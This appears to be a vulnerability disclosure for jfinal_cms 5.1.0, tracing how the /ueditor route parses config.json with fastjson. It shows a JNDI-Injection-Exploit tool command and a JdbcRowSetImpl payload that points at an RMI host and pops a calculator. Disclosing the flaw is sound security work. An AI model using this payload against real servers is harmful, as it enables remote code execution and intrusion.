jfinal_cms version:5.1.0
JDK version : jdk-8u351
The ActionEnter class is instantiated in the index method of the /ueditor route
data:image/s3,"s3://crabby-images/ef0f5/ef0f522add14756dd07d0f8711937237c1bbe728" alt="image"
The ConfigManager class is instantiated in the constructor of the ActionEnter class
data:image/s3,"s3://crabby-images/55014/55014cbe6a6f887a81fb64ce1a195931f1ffd4c0" alt="image"
The construction method of ConfigManager calls initEnv()
data:image/s3,"s3://crabby-images/4cf0d/4cf0d2913c1bc92c198149adf2ad6aa194cbce5f" alt="image"
Call JSONObject.parseObject to parse the file content, and the file content here is controllable, just replace the file content with the payload.
data:image/s3,"s3://crabby-images/03b00/03b00803d038bea9f09a3181a73dbc733a63635a" alt="image"
The file comes from WEB-INF/classes/config.json. With any file upload vulnerability in the background, this file can be replaced with a file containing the payload to trigger fastjson deserialization
data:image/s3,"s3://crabby-images/73a56/73a5694556ed6a08f921ed46c23596f90ce3e588" alt="image"
Run the tool on kali
```
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "calc.exe"
```
data:image/s3,"s3://crabby-images/a4de1/a4de1cabe1a6e2eafca8919d4d29a733e5251f94" alt="image"
payload:
```
{
"a":{
"@type":"java.lang.Class",
"val":"com.sun.rowset.JdbcRowSetImpl"
},
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://192.168.0.110:1099/d0inxc",
"autoCommit":true
}
}
```
data:image/s3,"s3://crabby-images/95263/95263f0ce15fa0daac6c7ee1885908f12d478a9f" alt="image"
Replace with payload
Visit /ueditor, execute the command to pop up the calculator
data:image/s3,"s3://crabby-images/a98bf/a98bfc5db4bd017dff574a9a79e10b1055597d5e" alt="136699966-b0b2294c-cdf1-4145-9340-cc0885a7e73d"
暂无评论